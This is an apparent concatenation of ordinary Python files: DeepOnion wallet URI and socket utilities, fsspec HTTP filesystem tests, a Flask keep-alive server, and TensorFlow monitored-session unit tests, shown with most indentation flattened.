kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
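# Example: with the default 'explorer.deeponion.org' entry above,
# block_explorer_URL(config, 'tx', '<txid>') returns
# 'http://explorer.deeponion.org/tx/<txid>' (and None for unknown kinds).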
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a DeepOnion address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'deeponion':
raise Exception("Not a deeponion URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid deeponion address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='deeponion', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
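# Round-trip sketch (assuming <addr> is a valid DeepOnion address):
#   create_URI(addr, 150000000, 'thanks')
#       -> 'deeponion:<addr>?amount=1.5&message=thanks'
#   parse_URI() on that URI
#       -> {'address': <addr>, 'amount': 150000000, 'message': 'thanks', 'memo': 'thanks'}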
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
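# Example: parse_json(b'{"id": 1}\nrest') -> ({'id': 1}, b'rest'); if the buffer
# contains no newline yet, it returns (None, <buffer unchanged>).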
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
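# Typical call order (sketch; the handler name is hypothetical):
#   sys.excepthook = my_crash_reporter
#   setup_thread_excepthook()          # must run before any Thread is created
#   threading.Thread(target=worker).start()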
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
test_http.py
|
import glob
import os
import pytest
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import fsspec
requests = pytest.importorskip('requests')
port = 9898
data = b'\n'.join([b'some test data'] * 1000)
realfile = "http://localhost:%i/index/realfile" % port
index = b'<a href="%s">Link</a>' % realfile.encode()
class HTTPTestHandler(BaseHTTPRequestHandler):
def _respond(self, code=200, headers=None, data=b''):
headers = headers or {}
headers.update({'User-Agent': 'test'})
self.send_response(code)
for k, v in headers.items():
self.send_header(k, str(v))
self.end_headers()
if data:
self.wfile.write(data)
def do_GET(self):
if self.path not in ['/index/realfile', '/index']:
self._respond(404)
return
d = data if self.path == '/index/realfile' else index
if 'Range' in self.headers:
ran = self.headers['Range']
b, ran = ran.split("=")
start, end = ran.split('-')
print(start)
print(end)
d = d[int(start):int(end)+1]
if 'give_length' in self.headers:
self._respond(200, {'Content-Length': len(d)}, d)
elif 'give_range' in self.headers:
self._respond(
200, {'Content-Range': "0-%i/%i" % (len(d) - 1, len(d))},
d
)
else:
self._respond(200, data=d)
def do_HEAD(self):
if 'head_ok' not in self.headers:
self._respond(405)
return
d = data if self.path == '/index/realfile' else index
if self.path not in ['/index/realfile', '/index']:
self._respond(404)
elif 'give_length' in self.headers:
self._respond(200, {'Content-Length': len(d)})
elif 'give_range' in self.headers:
self._respond(200, {'Content-Range': "0-%i/%i" %
(len(d) - 1, len(d))})
else:
self._respond(200) # OK response, but no useful info
@pytest.fixture(scope='module')
def server():
server_address = ('', port)
httpd = HTTPServer(server_address, HTTPTestHandler)
th = threading.Thread(target=httpd.serve_forever)
th.daemon = True
th.start()
try:
yield 'http://localhost:%i' % port
finally:
httpd.socket.close()
httpd.shutdown()
th.join()
def test_list(server):
h = fsspec.filesystem('http')
out = h.glob(server + '/index/*')
assert out == [server + '/index/realfile']
def test_exists(server):
h = fsspec.filesystem('http')
assert not h.exists(server + '/notafile')
def test_read(server):
h = fsspec.filesystem('http')
out = server + '/index/realfile'
with h.open(out, 'rb') as f:
assert f.read() == data
with h.open(out, 'rb', block_size=0) as f:
assert f.read() == data
with h.open(out, 'rb') as f:
assert f.read(100) + f.read() == data
def test_methods(server):
h = fsspec.filesystem('http')
url = server + '/index/realfile'
assert h.exists(url)
assert h.cat(url) == data
@pytest.mark.parametrize('headers', [{},
{'give_length': 'true'},
{'give_length': 'true', 'head_ok': 'true'},
{'give_range': 'true'}
])
def test_random_access(server, headers):
h = fsspec.filesystem('http', headers=headers)
url = server + '/index/realfile'
with h.open(url, 'rb') as f:
if headers:
assert f.size == len(data)
assert f.read(5) == data[:5]
# python server does not respect bytes range request
# we actually get all the data
f.seek(5, 1)
assert f.read(5) == data[10:15]
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I am alive!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
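# Usage sketch (illustrative): the main bot script imports and calls
# keep_alive() once, which serves "I am alive!" on port 8080 from a background
# thread so an external uptime pinger can keep the process awake, e.g.
#   from keep_alive import keep_alive
#   keep_alive()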
|
monitored_session_test.py
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import threading
import time
from tensorflow.contrib.framework.python.ops import variables as variables_lib
from tensorflow.contrib.testing.python.framework import util_test
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
class ScaffoldTest(test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.ready_for_local_init_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
variables.Variable(1, name='my_var')
variables.Variable(
2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
with self.test_session() as sess:
self.assertItemsEqual([b'my_var', b'my_local_var'],
sess.run(scaffold.ready_op))
self.assertItemsEqual([b'my_var'],
sess.run(scaffold.ready_for_local_init_op))
sess.run(scaffold.init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
sess.run(scaffold.local_init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
constant_op.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
def test_caches_values(self):
with ops.Graph().as_default():
variables.Variable([1])
scaffold1 = monitored_session.Scaffold()
scaffold1.finalize()
scaffold2 = monitored_session.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.ready_for_local_init_op,
scaffold2.ready_for_local_init_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with ops.Graph().as_default():
variables.Variable([1])
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
monitored_session.Scaffold().finalize()
def test_uses_passed_values(self):
with ops.Graph().as_default():
variables.Variable([1])
saver = saver_lib.Saver()
scaffold = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.ready_for_local_init_op)
self.assertEqual(7, scaffold.local_init_op)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with ops.Graph().as_default():
variables.Variable([1])
monitored_session.Scaffold().finalize()
with self.assertRaisesRegexp(RuntimeError,
'Graph is finalized and cannot be modified'):
constant_op.constant([0])
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = collections.Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def after_create_session(self, session): # pylint: disable=unused-argument
self.call_counter['after_create_session'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_summaries(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
for _ in range(101): # 100 is default summary writing steps
session.run(new_gstep)
summaries = util_test.latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(test.TestCase):
"""_WrappedSession tests."""
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEquals(sess.graph, wrapped_sess.graph)
self.assertEquals(sess.sess_str, wrapped_sess.sess_str)
def test_should_stop_on_close(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_uses_check_stop(self):
with self.test_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_delegates_to_wrapped_session(self):
with self.test_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
def test_close_twice(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
"""_CoordinatedSession tests."""
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEquals(sess.graph, coord_sess.graph)
self.assertEquals(sess.sess_str, coord_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
def test_should_stop_on_close(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
def test_should_stop_on_coord_stop(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
def test_stop_threads_on_close_after_exception(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
class AbortAtNSession(object):
"""A mock sessionthat aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise errors_impl.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
def test_recovery(self):
with self.test_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
      # Make the recoverable session use these 3 sessions in sequence by
      # passing a factory that pops from the sessions_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
"""Tests of _HookedSession."""
def testRunPassesAllArguments(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
session_run_hook.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
session_run_hook.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['begin'], 0)
self.assertEqual(hook.call_counter['after_create_session'], 0)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
another_tensor = constant_op.constant([5], name='another_tensor')
third_tensor = constant_op.constant([10], name='third_tensor')
mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
sess.run(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
c_tensor = constant_op.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [10]})
